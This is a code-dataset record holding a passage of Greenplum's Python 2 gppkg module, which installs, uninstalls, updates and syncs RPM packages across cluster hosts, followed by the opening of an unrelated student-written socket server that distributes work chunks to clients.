# package proj-4.7.0-1.x86_64 is already installed
# package postgis-1.0-1.x86_64 is already installed
for line in lines:
if 'already installed' in line.lower():
package_name = line.split()[1]
rpm_name = "%s.rpm" % package_name
rpm_set.remove(rpm_name)
else:
# This is unexpected, so bubble up the ExecutionError.
raise
# MPP-14359 - installation and uninstallation prechecks must also consider
# the archive. That is, if a partial installation had added all rpms
# but failed to add the archive package, then for our purposes, we consider
# the package not yet installed and still in need of InstallPackageLocally.
archive_package_exists = CheckFile(os.path.join(GPPKG_ARCHIVE_PATH, self.gppkg.pkg)).run()
package_already_installed = (not rpm_set) and archive_package_exists
if package_already_installed:
raise AlreadyInstalledError(self.gppkg.pkg)
# Code path 1 (See docstring)
return rpm_set
class ValidateUninstallPackage(Operation):
"""
Ensure that the given rpms can be uninstalled safely. This is accomplished mainly
through use of rpm --test, which will have one of a few outcomes:
1) A return code of 0, indicating the uninstallation should proceed smoothly
2) A non-zero return code, and stderr indicating some of the rpms are already uninstalled.
We simply omit such rpms from the returned list of rpms, indicating to the caller
that to be successful, uninstallation should only be attempted on the filtered list of rpms.
3) A non-zero return code, and stderr indicating that dependencies remain.
Lastly, for an edge case, if we determine that none of the relevant rpms are currently installed
*and* the archive package does not exist, we declare the package is not installed.
TODO: Use regexes for more reliable string matching.
"""
def __init__(self, gppkg):
self.gppkg = gppkg
def execute(self):
rpm_list = [self.gppkg.main_rpm] + self.gppkg.dependencies
def strip_extension_and_arch(filename):
# expecting filename of form %{name}-%{version}-%{release}.%{arch}.rpm
rest, ext = os.path.splitext(filename)
rest, arch = os.path.splitext(rest)
return rest
rpm_set = set([strip_extension_and_arch(rpm) for rpm in rpm_list])
rpm_uninstall_string = ' '.join(rpm_set)
rpm_uninstall_command = 'rpm --test -e %s --dbpath %s' % (rpm_uninstall_string, RPM_DATABASE)
cmd = Command('Validating rpm uninstallation', rpm_uninstall_command)
logger.info(cmd) # TODO: AK: This should be debug(), but RMI cannot propagate a log level.
try:
cmd.run(validateAfter = True)
except ExecutionError, e:
lines = e.cmd.get_results().stderr.splitlines()
# Forking between code paths 2 and 3 depends on some meaningful stderr
# Without such stderr, we must bubble up the ExecutionError.
if len(lines) == 0:
raise
if 'failed dependencies' in lines[0].lower():
# Code path 3 (see docstring)
# example stderr:
# error: Failed dependencies:
# jre = 1.6.0_26 is needed by (installed) gphdfs-1.1-1.x86_64
self.resolve_shared_dependencies(rpm_set, lines[1:])
else:
# Code path 2, possibly (see docstring)
# example stderr:
# error: package postgis-1.0-1.x86_64 is not installed
# error: package proj-4.7.0-1.x86_64 is not installed
# error: package geos-3.2.2-1.x86_64 is not installed
for line in lines:
if 'not installed' in line.lower():
package_name = line.split()[2]
rpm_set.remove(package_name)
else:
# This is unexpected, so bubble up the ExecutionError.
raise
# MPP-14359 - installation and uninstallation prechecks must also consider
# the archive. That is, if a partial uninstallation had removed all rpms
# but failed to remove the archive package, then for our purposes, we consider
# the package installed and still in need of UninstallPackageLocally.
archive_package_exists = CheckFile(os.path.join(GPPKG_ARCHIVE_PATH, self.gppkg.pkg)).run()
package_not_installed = (not rpm_set) and (not archive_package_exists)
if package_not_installed:
raise NotInstalledError(self.gppkg.pkg)
# Code path 1 (See docstring)
return rpm_set
def resolve_shared_dependencies(self, rpm_set, dependency_lines):
"""
This is a very naive resolution to shared dependencies. (See code path #3 in ValidateUninstallPackage.execute)
Among the rpms we attempt to remove from the system, a subset cannot be
removed during this particular gppkg uninstallation, because their removal would violate
the dependency constraints of other rpms that remain in the system; we simply leave these culprit rpm(s) behind.
More specifically, the preceding rpm --test -e command has given us the violated *capabilities*. For each *capability*,
we query the rpm database with --whatprovides to discern the culprit rpm(s).
In simpler terms, consider this example:
pljava depends on jre, which its gppkg contains
gphdfs depends on jre, which its gppkg contains
install the gppkgs for both pljava and gphdfs
uninstall pljava gppkg
we internally attempt to "rpm -e" the jre rpm, hitting the gphdfs dependency error here involving "jre = 1.6"
we determine that the jre rpm is responsible for *providing* "jre = 1.6"
so, we ultimately omit the jre rpm from our "rpm -e" and move on
TODO: AK: A more robust version of this function would ensure that the remaining
rpms are, in fact, bound by a remaining gppkg. We defer this responsibility for now because gppkgs
should not have external dependencies. That is, no package should have requirements on rpms
not contained in its own gppkg distro. So, it's safe to assume that if foo is a culprit rpm, there exists
some gppkg bar that internally contains foo. (I realize that, with time, this will not be a scalable requirement
for gppkgs... hence the TODO.)
@type rpm_set: set
@param rpm_set: rpms being uninstalled, among which there exists an rpm
whose removal violates the dependencies of remaining rpms
@type dependency_lines: list
@param dependency_lines: lines produced from the stderr in
code path #3 in ValidateUninstallPackage.execute
ex: [" jre >= 1.6.0_26 is needed by (installed) gphdfs-1.1-1.x86_64"]
"""
for dependency_line in dependency_lines:
violated_capability = dependency_line.split()[0] # e.g. "jre"
cmd = Command('Discerning culprit rpms for %s' % violated_capability,
'rpm -q --whatprovides %s --dbpath %s' % (violated_capability, RPM_DATABASE))
cmd.run(validateAfter = True)
culprit_rpms = set(cmd.get_results().stdout.splitlines())
rpm_set -= culprit_rpms
class ExtractPackage(Operation):
"""
Extract the contents of the package into the temp folder
TODO: AK: Extraction should be implemented as a context manager.
"""
def __init__(self, gppkg):
self.gppkg = gppkg
def execute(self):
#clean up tmp extraction folder
if os.path.exists(TEMP_EXTRACTION_PATH) and not CleanupDir(TEMP_EXTRACTION_PATH).run():
logger.error('Could not clean temp folder')
raise IOError
#untar the package into tmp folder
with closing(tarfile.open(self.gppkg.abspath)) as tarinfo:
tarinfo.extractall(TEMP_EXTRACTION_PATH)
#move all the deps into same folder as the main rpm
path = os.path.join(TEMP_EXTRACTION_PATH, DEPS_DIR)
if os.path.exists(path):
for cur_file in os.listdir(path):
shutil.move(os.path.join(TEMP_EXTRACTION_PATH, DEPS_DIR, cur_file), TEMP_EXTRACTION_PATH)
class InstallPackageLocally(Operation):
"""
Installs a package on the local host
This operation must take a slew of starting conditions and drive the state
of the local machine towards the ending state, in which the given package is successfully
installed, the rpm database is sane, and the package resides in the designated archive.
To that end, we indiscriminately squash AlreadyInstalledErrors arising from ValidateInstallPackage,
because in this context, it's not an exception, but rather an indication of our desired ending
conditions.
We must consider the following scenarios and more: package was deleted from archive,
the main comprising rpm was uninstalled, dependent rpms were removed, the rpm database was
corrupted, etc.
Again, much like ValidateInstallPackages, we make cheap reuse of this code for the purposes
of an --update as there is considerable commonality.
"""
def __init__(self, package_path, is_update = False):
self.package_path = package_path
self.is_update = is_update
def execute(self):
current_package_location = self.package_path
package_name = os.path.basename(current_package_location)
logger.info('Installing %s locally' % package_name)
final_package_location = os.path.join(GPPKG_ARCHIVE_PATH, package_name)
gppkg = Gppkg.from_package_path(current_package_location)
ExtractPackage(gppkg).run()
# squash AlreadyInstalledError here: the caller doesn't ever need to
# know that we didn't have to do anything here
try:
rpm_set = ValidateInstallPackage(gppkg, is_update = self.is_update).run()
except AlreadyInstalledError, e:
logger.info(e)
return
if rpm_set:
if self.is_update:
rpm_install_command = 'rpm -U --force %s --dbpath %s --prefix=%s'
else:
rpm_install_command = 'rpm -i %s --dbpath %s --prefix=%s'
rpm_install_command = rpm_install_command % \
(" ".join([os.path.join(TEMP_EXTRACTION_PATH, rpm) for rpm in rpm_set]),
RPM_DATABASE,
RPM_INSTALLATION_PATH)
cmd = Command('Installing rpms', rpm_install_command)
logger.info(cmd)
cmd.run(validateAfter = True)
# TODO: AK: MPP-15568
# TODO: AK: abstraction layer for archive interactions... to hide use of shutil.copy, RemoveFile, etc.
MakeDir(GPPKG_ARCHIVE_PATH).run()
shutil.copy(current_package_location, final_package_location)
logger.info("Completed local installation of %s." % package_name)
class UninstallPackageLocally(Operation):
"""
Uninstalls a package on the local host
This operation must take a slew of starting conditions and drive the state
of the local machine towards the ending state, in which the given package is successfully
uninstalled, the rpm database is sane, and the package is removed from the archive.
To that end, we indiscriminately squash NotInstalledErrors arising from ValidateUninstallPackage,
because in this context, it's not an exception, but rather an indication of our desired ending
conditions.
We must consider the following scenarios and more: package was deleted from archive,
the main comprising rpm was uninstalled, dependent rpms were removed, the rpm database was
corrupted, etc.
"""
def __init__(self, package_name):
self.package_name = package_name
def execute(self):
# TODO: AK: MPP-15737 - we're entirely dependent on the package residing in the archive
current_package_location = os.path.join(GPPKG_ARCHIVE_PATH, self.package_name)
gppkg = Gppkg.from_package_path(current_package_location)
# squash NotInstalledError here: the caller doesn't ever need to
# know that we didn't have to do anything here
try:
rpm_set = ValidateUninstallPackage(gppkg).run()
except NotInstalledError, e:
logger.info(e)
return
if rpm_set:
rpm_uninstall_command = 'rpm -e %s --dbpath %s' % (" ".join(rpm_set), RPM_DATABASE)
cmd = Command('Uninstalling rpms', rpm_uninstall_command)
logger.info(cmd)
cmd.run(validateAfter = True)
# TODO: AK: abstraction layer for archive interactions... to hide use of shutil.copy, RemoveFile, etc.
MakeDir(GPPKG_ARCHIVE_PATH).run()
RemoveFile(current_package_location).run()
logger.info("Completed local uninstallation of %s." % self.package_name)
class SyncPackages(Operation):
"""
Synchronizes packages from master to a remote host
TODO: AK: MPP-15568
"""
def __init__(self, host):
self.host = host
def execute(self):
if not CheckDir(GPPKG_ARCHIVE_PATH).run():
MakeDir(GPPKG_ARCHIVE_PATH).run()
if not CheckRemoteDir(GPPKG_ARCHIVE_PATH, self.host).run():
MakeRemoteDir(GPPKG_ARCHIVE_PATH, self.host).run()
# set of packages on the master
master_package_set = set(ListFilesByPattern(GPPKG_ARCHIVE_PATH, '*' + GPPKG_EXTENSION).run())
# set of packages on the remote host
remote_package_set = set(ListRemoteFilesByPattern(GPPKG_ARCHIVE_PATH, '*' + GPPKG_EXTENSION, self.host).run())
# packages to be uninstalled on the remote host
uninstall_package_set = remote_package_set - master_package_set
# packages to be installed on the remote host
install_package_set = master_package_set - remote_package_set
if not install_package_set and not uninstall_package_set:
logger.info('The packages on %s are consistent.' % self.host)
return
if install_package_set:
logger.info('The following packages will be installed on %s: %s' % (self.host, ', '.join(install_package_set)))
for package in install_package_set:
logger.debug('copying %s to %s' % (package, self.host))
dstFile = os.path.join(GPHOME, package)
Scp(name = 'copying %s to %s' % (package, self.host),
srcFile = os.path.join(GPPKG_ARCHIVE_PATH, package),
dstFile = dstFile,
dstHost = self.host).run(validateAfter = True)
RemoteOperation(InstallPackageLocally(dstFile), self.host).run()
RemoveRemoteFile(dstFile, self.host).run()
if uninstall_package_set:
logger.info('The following packages will be uninstalled on %s: %s' % (self.host, ', '.join(uninstall_package_set)))
for package in uninstall_package_set:
RemoteOperation(UninstallPackageLocally(package), self.host).run()
class InstallPackage(Operation):
def __init__(self, gppkg, master_host, standby_host, segment_host_list):
self.gppkg = gppkg
self.master_host = master_host
self.standby_host = standby_host
self.segment_host_list = segment_host_list
def execute(self):
logger.info('Installing package %s' % self.gppkg.pkg)
# TODO: AK: MPP-15736 - precheck package state on master
ExtractPackage(self.gppkg).run()
ValidateInstallPackage(self.gppkg).run()
# perform any pre-installation steps
PerformHooks(hooks = self.gppkg.preinstall,
master_host = self.master_host,
standby_host = self.standby_host,
segment_host_list = self.segment_host_list).run()
# distribute package to segments
srcFile = self.gppkg.abspath
dstFile = os.path.join(GPHOME, self.gppkg.pkg)
GpScp(srcFile, dstFile, self.segment_host_list).run()
# install package on segments
HostOperation(InstallPackageLocally(dstFile), self.segment_host_list).run()
# install package on standby
if self.standby_host:
Scp(name = 'copying %s to %s' % (srcFile, self.standby_host),
srcFile = srcFile,
dstFile = dstFile,
dstHost = self.standby_host).run(validateAfter = True)
RemoteOperation(InstallPackageLocally(dstFile), self.standby_host).run()
# install package on master
InstallPackageLocally(srcFile).run()
# perform any post-installation steps
PerformHooks(hooks = self.gppkg.postinstall,
master_host = self.master_host,
standby_host = self.standby_host,
segment_host_list = self.segment_host_list).run()
logger.info('%s successfully installed.' % (self.gppkg.pkg))
class PerformHooks(Operation):
def __init__(self, hooks, master_host, standby_host, segment_host_list):
"""
Performs steps that have been specified in the yaml file for a particular
stage of gppkg execution
TODO: AK: A packager may have added commands to their hooks, with the
assumption that the current working directory would be that which contains
the spec file, rpms, and other artifacts (external scripts, perhaps.) To support
this, these commands should be prefixed with a "cd".
TODO: AK: I'm adding master_host for consistency.
But, why would we ever need master_host? We're on the master host!
"""
self.hooks = hooks
self.master_host = master_host
self.standby_host = standby_host
self.segment_host_list = segment_host_list
def execute(self):
if self.hooks is None:
return
for hook in self.hooks:
key = hook.keys()
if key is None:
return
key_str = key[0]
if key_str.lower() == 'master':
if self.standby_host:
RemoteCommand(hook[key_str], [self.standby_host]).run()
LocalCommand(hook[key_str], True).run()
elif key_str.lower() == 'segment':
RemoteCommand(hook[key_str], self.segment_host_list).run()
class UninstallPackage(Operation):
def __init__(self, gppkg, master_host, standby_host, segment_host_list):
self.gppkg = gppkg
self.master_host = master_host
self.standby_host = standby_host
self.segment_host_list = segment_host_list
def execute(self):
logger.info('Uninstalling package %s' % self.gppkg.pkg)
# TODO: AK: MPP-15736 - precheck package state on master
ExtractPackage(self.gppkg).run()
ValidateUninstallPackage(self.gppkg).run()
# perform any pre-uninstallation steps
PerformHooks(hooks = self.gppkg.preuninstall,
master_host = self.master_host,
standby_host = self.standby_host,
segment_host_list = self.segment_host_list).run()
# uninstall on segments
HostOperation(UninstallPackageLocally(self.gppkg.pkg), self.segment_host_list).run()
if self.standby_host:
RemoteOperation(UninstallPackageLocally(self.gppkg.pkg), self.standby_host).run()
UninstallPackageLocally(self.gppkg.pkg).run()
# perform any pre-installation steps
PerformHooks(hooks = self.gppkg.postuninstall,
master_host = self.master_host,
standby_host = self.standby_host,
segment_host_list = self.segment_host_list).run()
logger.info('%s successfully uninstalled.' % self.gppkg.pkg)
class QueryPackage(Operation):
INFO, LIST, ALL = range(3)
def __init__(self, query_type, package_path):
self.query_type = query_type
self.package_path = package_path
def execute(self):
if self.query_type == QueryPackage.INFO:
def package_details(p):
yield 'Name', p.pkgname
yield 'Version', p.version
yield 'Architecture', p.architecture
yield 'OS', p.os
yield 'GPDBVersion', str(p.gpdbversion)
yield 'Description', p.description
def print_package_info(package):
tabLog = TableLogger()
for name, value in package_details( package ):
tabLog.info([name, value])
tabLog.outputTable()
package = Gppkg.from_package_path(self.package_path)
print_package_info( package )
elif self.query_type == QueryPackage.LIST:
package = Gppkg.from_package_path(self.package_path)
for file in package.file_list:
print file
elif self.query_type == QueryPackage.ALL:
package_name_list = ListPackages().run()
for package_name in package_name_list:
print package_name
else:
package = Gppkg.from_package_path(self.package_path)
try:
ExtractPackage(package).run()
ValidateInstallPackage(package).run()
except AlreadyInstalledError:
print '%s is installed.' % package.pkgname
else:
print '%s is not installed.' % package.pkgname
class BuildGppkg(Operation):
'''
Builds a gppkg given a directory containing
the spec file, rpms and any pre/post installation scripts
'''
def __init__(self, directory):
self.directory = directory
def execute(self):
directory = self.directory
logger.info('Building gppkg')
#Check if the directory is valid
if not os.path.exists(directory) or not os.path.isdir(directory):
logger.error('%s is an Invalid directory' % directory)
raise BuildPkgError
filelist = os.listdir(directory)
#Check for the spec file
specfile = directory + '/' + SPECFILE_NAME
if not os.path.exists(specfile):
logger.error(' Spec file does not exist')
raise BuildPkgError
#parse the spec file and get the name, version and arch
#this is used to name the gppkg
pkg_path_details = self._get_package_name_details(specfile)
if pkg_path_details is None:
raise BuildPkgError
#The file already exists. Rewrite the original with the new one
pkg = pkg_path_details['pkgname'] + '-' + str(pkg_path_details['version']) + '-' + pkg_path_details['os'] + '-' + pkg_path_details['architecture'] + GPPKG_EXTENSION
if os.path.exists(pkg):
os.remove(pkg)
#Verify the spec file
if not self._verify_specfile(specfile, directory):
raise BuildPkgError
#tar and gzip the directory
#rename the file with .gppkg extension
with closing(tarfile.open(pkg, 'w:gz')) as tarinfo:
for cur_file in filelist:
tarinfo.add(name = os.path.join(directory, cur_file),
arcname = cur_file)
logger.info('Completed building gppkg')
def _get_package_name_details(self, specfile):
'''
Get details about the name, version, operating system, architecture
of the package. The final gppkg which will be created
will be named as <name>-<version>-<os>-<arch>.gppkg
'''
logger.debug('_get_package_name_details')
cur_file = None
with open(specfile) as cur_file:
yamlfile = yaml.load(cur_file)
tags = yamlfile.keys()
pkg_path_details = {}
#return all the required tags as a dict
for tag in tags:
if tag.lower() in SPECFILE_REQUIRED_TAGS:
pkg_path_details[tag.lower()] = yamlfile[tag]
return pkg_path_details
def _verify_specfile(self, specfile, directory):
'''
Reads the spec file and makes sure that the tags are correct.
'''
logger.debug('_verify_specfile')
cur_file = None
try:
with open(specfile) as cur_file:
yamlfile = yaml.load(cur_file)
if not self._verify_tags(yamlfile):
return False
return True
except ScannerError, ex:
return False
def _verify_tags(self, yamlfile):
'''
Verify that the tags are valid.
Returns true if all tags are valid
False otherwise
'''
logger.debug('_verify_tags')
tags = yamlfile.keys()
tags = [tag.lower() for tag in tags]
#check required tags
for required_tag in SPECFILE_REQUIRED_TAGS:
if required_tag not in tags:
logger.error(' Required tag %s missing in Spec file' % required_tag)
return False
#check for invalid tags
for tag in tags:
if tag not in SPECFILE_OPTIONAL_TAGS and tag not in SPECFILE_REQUIRED_TAGS:
logger.error(' Invalid tag %s in Spec file' % tag)
return False
return True
class UpdatePackage(Operation):
""" TODO: AK: Enforce gppkg version is higher than currently installed version """
def __init__(self, gppkg, master_host, standby_host, segment_host_list):
self.gppkg = gppkg
self.master_host = master_host
self.standby_host = standby_host
self.segment_host_list = segment_host_list
def execute(self):
logger.info('Updating package %s' % self.gppkg.pkg)
ExtractPackage(self.gppkg).run()
ValidateInstallPackage(self.gppkg, is_update = True).run()
# distribute package to segments
srcFile = self.gppkg.abspath
dstFile = os.path.join(GPHOME, self.gppkg.pkg)
GpScp(srcFile, dstFile, self.segment_host_list).run()
# update package on segments
HostOperation(UpdatePackageLocally(dstFile), self.segment_host_list).run()
# update package on standby
if self.standby_host:
Scp(name = 'copying %s to %s' % (srcFile, self.standby_host),
srcFile = srcFile,
dstFile = dstFile,
dstHost = self.standby_host).run(validateAfter = True)
RemoteOperation(UpdatePackageLocally(dstFile), self.standby_host).run()
# update package on master
UpdatePackageLocally(srcFile).run()
# perform any post-update steps
PerformHooks(hooks = self.gppkg.postupdate,
master_host = self.master_host,
standby_host = self.standby_host,
segment_host_list = self.segment_host_list).run()
logger.info('%s successfully updated.' % (self.gppkg.pkg))
class UpdatePackageLocally(Operation):
"""
Updates a package on the local host
We make cheap reuse of InstallPackageLocally with the propagation of is_update = True, which
effectively changes the rpm --test command to use -U instead of -i. Beyond the invocation of
InstallPackageLocally, here, we also clean up the archive directory to remove other (ideally, older)
versions of the updated package.
"""
def __init__(self, package_path):
self.package_path = package_path
def execute(self):
InstallPackageLocally(self.package_path, is_update = True).run()
# Remove other versions of the package from archive.
# Note: Do not rely on filename format to discern such packages.
# Rather, interrogate a package only through the Gppkg class interface.
current_package = Gppkg.from_package_path(self.package_path)
MakeDir(GPPKG_ARCHIVE_PATH).run()
archived_package_paths = ListFiles(GPPKG_ARCHIVE_PATH).run()
for archived_package_path in archived_package_paths:
temp_package = Gppkg.from_package_path(os.path.join(GPPKG_ARCHIVE_PATH, archived_package_path))
if temp_package.pkgname == current_package.pkgname and temp_package.version != current_package.version:
RemoveFile(os.path.join(GPPKG_ARCHIVE_PATH, archived_package_path)).run()
class CleanGppkg(Operation):
'''
Cleans up the Gppkg from the cluster in case of partial
installation or removal. This might not be required if
we can make the install and uninstall options idempotent.
This operation is exactly the same as remove but we dont
check on each host to see if the rpm is installed or not.
'''
def __init__(self, standby_host, segment_host_list):
self.standby_host = standby_host
self.segment_host_list = segment_host_list
def execute(self):
operations = [SyncPackages(host) for host in self.segment_host_list]
if self.standby_host:
operations.append(SyncPackages(self.standby_host))
ParallelOperation(operations).run()
for operation in operations:
try:
operation.get_ret()
except Exception, e:
raise ExceptionNoStackTraceNeeded('SyncPackages failed' + str(e))
logger.info('Successfully cleaned the cluster')
class MigratePackages(Operation):
"""
Migrates packages from another $GPHOME to this one
This functionality is meant to facilitate minor version upgrade, whereby old packages
need to be brought over from the older $GPHOME to the newer $GPHOME.
Presumably, this could also be used to migrate packages across arbitrary choices
of $GPHOMEs. However, the migration will only succeed if the packages being migrated
are actually compatible with the target GPDB.
"""
def __init__(self, from_gphome, to_gphome):
self.from_gphome, self.to_gphome = from_gphome, to_gphome
def execute(self):
if not os.path.samefile(self.to_gphome, GPHOME):
raise ExceptionNoStackTraceNeeded('The target GPHOME, %s, must match the current $GPHOME used to launch gppkg.' % self.to_gphome)
if os.path.samefile(self.to_gphome, self.from_gphome):
raise ExceptionNoStackTraceNeeded('The source and target GPHOMEs, %s => %s, must differ for packages to be migrated.' % (self.from_gphome, self.to_gphome))
# TODO: AK: Given an invalid from_gphome, we'll end up creating a 'share/packages' subdirectory within it.
old_archive_path = os.path.join(self.from_gphome, ARCHIVE_PATH)
MakeDir(old_archive_path).run()
packages = ListFilesByPattern(old_archive_path, '*' + GPPKG_EXTENSION).run()
if not packages:
logger.info('There are no packages to migrate from %s.' % self.from_gphome)
return
logger.info('The following packages will be migrated: %s' % ', '.join(packages))
for package in packages:
package_path = os.path.join(old_archive_path, package)
try:
InstallPackageLocally(package_path).run()
except AlreadyInstalledError:
logger.info("%s is already installed." % package)
except Exception:
logger.exception("Failed to migrate %s from %s" % (old_archive_path, package))
logger.info('The package migration has completed.')
class GpScp(Operation):
"""
TODO: AK: This obviously does not belong here. My preference would be that it remain here until
the following problem is solved.
MPP-15270 - Improve performance of file transfer across large clusters
I suggest:
We consume an extra parameter 'fanout'. We partition the host_list into a number of buckets
given by 'fanout'. For each bucket, we scp the artifact to the first host in the bucket, and then
we recursively invoke GpScp on that machine for the remaining hosts in its bucket.
GpScp := ParallelOperation([ A(i) for i in range(0, n) ])
A := SerialOperation(B, C)
B := scp source_path target_path @ host_i
where host_i := the first host in the ith bucket
C := RemoteOperation(GpScp(target_path, target_path, host_list_i))
where host_list_i := the remaining hosts in the ith bucket
"""
def __init__(self, source_path, target_path, host_list):
self.source_path = source_path
self.target_path = target_path
self.host_list = host_list
self.pool = None
def execute(self):
self.pool = WorkerPool()
for host in self.host_list:
self.pool.addCommand(Scp(name = 'copying %s to %s' % (self.source_path, host),
srcFile = self.source_path,
dstFile = self.target_path,
dstHost = host))
self.pool.join()
class HostOperation(Operation):
"""
TODO: AK: This obviously does not belong here. My preference would be to move it to gppylib.operations.utils
when another consumer becomes clear.
TODO: AK: For generality, the underlying operation should inherit/implement NestedHostOperation so that
it may be initialized with information about the host to which it's been bound. This is fortunately not necessary
for our purposes here, so it's deferrable.
TODO: AK: Build a SegHostOperation that wraps this and is driven by GpArray content.
TODO: AK: Implement something similar for a SegmentOperation + NestedSegmentOperation.
TODO: AK: This (as well as ParallelOperation) would benefit from an appropriate choice of return value. The likely
choice would be: [op.get_ret() for op in self.operations]
"""
def __init__(self, operation, host_list):
self.operation = operation
self.host_list = host_list
def execute(self):
operations = []
for host in self.host_list:
operations.append(RemoteOperation(self.operation, host))
ParallelOperation(operations).run()
for operation in operations:
operation.get_ret()
|
lpetrov-pivotal/gpdb
|
gpMgmt/bin/gppylib/operations/package.py
|
Python
|
apache-2.0
| 53,027
|
[
"ORCA"
] |
6e64536d248d25e8db8b17d528a1885c1ad23dd0151853a0f83f8889f0944c41
|
__author__ = 'chris hamm'
#NetworkServer_r9E
#Created: 1/17/2015
#THINGS ADDED/CHANGED FROM THIS REVISION
#Now able to receive a chunk object from the controller class
#Extract information from a chunk object (THESE FUNCTIONS ARE NO LONGER NEEDED)
#(In progress)Send extracted information over the network to the client
#Changed data type of dictionary of clients waiting for a reply to a list
#THINGS ADDED FROM REVISION 9D
#Added lists for the server to use to keep track of things that have happened and still need to be done
#A list that records all of the clients that have crashed (and have been detected as crashed)
#A list of clients that are waiting for a reply
#(In Progress) A list of what each client is currently working on
#(in progress) A list of chunk objects that contains the chunk of a crashed client (chunk added when client crashes, and chunk is removed when a new client is given the chunk)
#dictionary that records how many times each command has been issued by the server
#-Outbound Commands from server to controller
#-Outbound Commands from server to client
#-Inbound Commands from Controller to server
#-Inbound Commands for Client to server
#Added functions to parse chunk objects (Has now been decided that these will not be needed)
#chunk object path: server-controller -> server (converted to string to be sent over network) -> client (convert back to chunk object) -> client-controller
import socket
import platform
import Chunk
#=================================================================================================
#SERVER CONSTRUCTOR/CLASS DEFINITION
#=================================================================================================
class NetworkServer(): #CLASS NAME WILL NOT CHANGE BETWEEN VERSIONS
#class variables
host= '' #Symbolic name, meaning all available interfaces
port= 49200
numOfClients= 0
serverSocket = 0
serverIsRunning = True
#list to store the socket and address of every client
listOfClients = [] #This list is a list of tuples (socket, address)
listOfControllerMessages = [] #holds a list of strings that have been sent by the controller class
listOfCrashedClients= [] #records the ip address of any client that has crashed during the last server run
#listOfInactiveClients = [] #records the ip address of any client who needs something to do
#dictionary (below) that holds the ip of each client that is waiting for a reply as the key and what it is waiting for as the value
#dictionaryOfClientsWaitingForAReply = {} #Possible values: "NEXTCHUNK", "FOUNDSOLUTION"
listOfClientsWaitingForAReply= []
dictionaryOfCurrentClientTasks = {} #dictionary that holds the ip of each client as the key and the chunk it is working on as the value
recordOfOutboundCommandsFromServerToController = {} #dictionary that records how many times the server has issued a command to the controller
recordOfInboundCommandsFromControllerToServer = {} #dictionary that records how many times the server received a command from the controller
recordOfOutboundCommandsFromServerToClient = {} #dictionary that records how many times the server has issued a command to the client
recordOfInboundCommandsFromClientToServer = {} #dictionary that records how many times the server received a command from from the client(s)
#--------------------------------------------------------------------------------
#constructor
#--------------------------------------------------------------------------------
def __init__(self, pipeendconnectedtocontroller):
self.pipe= pipeendconnectedtocontroller
#socket.AF_INET is a socket address family represented as a pair. (hostname, port). This is the default parameter
#socket.SOCK_STREAM is the default parameter. This defines the socket type
self.serverSocket= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "STATUS: Server socket created successfully"
#..................................................................................
#Bind the socket to local host and port
#..................................................................................
try: #Bind socket try block
self.serverSocket.bind((self.host,self.port))
print "STATUS: Socket bind complete."
except socket.error as inst:
print "========================================================================================"
print "ERROR: failed to bind (host, port) to serverSocket"
print type(inst) #the exception instance
print inst.args #srguments stored in .args
print inst #_str_ allows args tto be printed directly
print "========================================================================================"
raise Exception("Could not bind to socket! Server Must Shut Down.")
#..................................................................................
#Detect Operating System
#..................................................................................
try: #getOS try block
print "*************************************"
print " Network Server"
print "*************************************"
print "OS DETECTION:"
if(platform.system()=="Windows"): #Detecting Windows
print platform.system()
print platform.win32_ver()
elif(platform.system()=="Linux"): #Detecting Linux
print platform.system()
print platform.dist()
elif(platform.system()=="Darwin"): #Detecting OSX
print platform.system()
print platform.mac_ver()
else: #Detecting an OS that is not listed
print platform.system()
print platform.version()
print platform.release()
print "*************************************"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception was thrown in getOS try block"
print type(inst) #the exception instance
print inst.args #srguments stored in .args
print inst #_str_ allows args tto be printed directly
print "========================================================================================"
#..................................................................................
#Get the IP Address
#..................................................................................
try: #getIP tryblock
print "STATUS: Getting your network IP adddress"
if(platform.system()=="Windows"):
print socket.gethostbyname(socket.gethostname())
elif(platform.system()=="Linux"):
#Source: http://stackoverflow.com/questions/11735821/python-get-localhost-ip
#Claims that this works on linux and windows machines
import fcntl
import struct
import os
def get_interface_ip(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s',ifname[:15]))[20:24])
#end of def
def get_lan_ip():
ip = socket.gethostbyname(socket.gethostname())
if ip.startswith("127.") and os.name != "nt":
interfaces = ["eth0","eth1","eth2","wlan0","wlan1","wifi0","ath0","ath1","ppp0"]
for ifname in interfaces:
try:
ip = get_interface_ip(ifname)
print "IP address was retrieved from the " + str(ifname) + " interface."
break
except IOError:
pass
return ip
#end of def
print get_lan_ip()
elif(platform.system()=="Darwin"):
print socket.gethostbyname(socket.gethostname())
else:
#NOTE: MAY REMOVE THIS AND REPLACE WITH THE LINUX DETECTION METHOD
print "INFO: The system has detected that you are not running Windows, OS X, or Linux."
print "INFO: System is using a generic IP detection method"
print socket.gethostbyname(socket.gethostname())
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception was thrown in getIP try block"
print type(inst) #the exception instance
print inst.args #srguments stored in .args
print inst #_str_ allows args tto be printed directly
print "========================================================================================"
#..................................................................................
#Preset the dictionary counters
#..................................................................................
self.recordOfOutboundCommandsFromServerToController['nextChunk'] = 0
self.recordOfOutboundCommandsFromServerToController['chunkAgain'] = 0
self.recordOfOutboundCommandsFromServerToController['waiting'] = 0
self.recordOfOutboundCommandsFromServerToController['done'] = 0
self.recordOfOutboundCommandsFromServerToClient['DONE'] = 0
self.recordOfOutboundCommandsFromServerToClient['nextChunk'] = 0
self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_NEXT_CHUNK'] = 0
self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_CHUNK_AGAIN'] = 0
self.recordOfInboundCommandsFromControllerToServer['REPLY_TO_DONE'] = 0
self.recordOfInboundCommandsFromControllerToServer['Chunk_Objects'] = 0
self.recordOfInboundCommandsFromClientToServer['NEXT'] = 0
self.recordOfInboundCommandsFromClientToServer['FOUNDSOLUTION'] = 0
self.recordOfInboundCommandsFromClientToServer['CRASHED'] = 0
#..................................................................................
#Start listening to socket
#..................................................................................
self.serverSocket.listen(5)
print "Waiting for initial client to connect..."
#..................................................................................
#Waiting for initial Client to connect
#..................................................................................
sock, addr= self.serverSocket.accept()
print "INFO: First client has connected"
print "INFO: Connected with " + addr[0] + ":" + str(addr[1])
self.listOfClients.append((sock, addr)) #add the tuple to the list of clients
print "STATUS: Client successfully added to the list of clients"
#When a client is added, they are also added to the dictionaryOfCurrentClientTasks
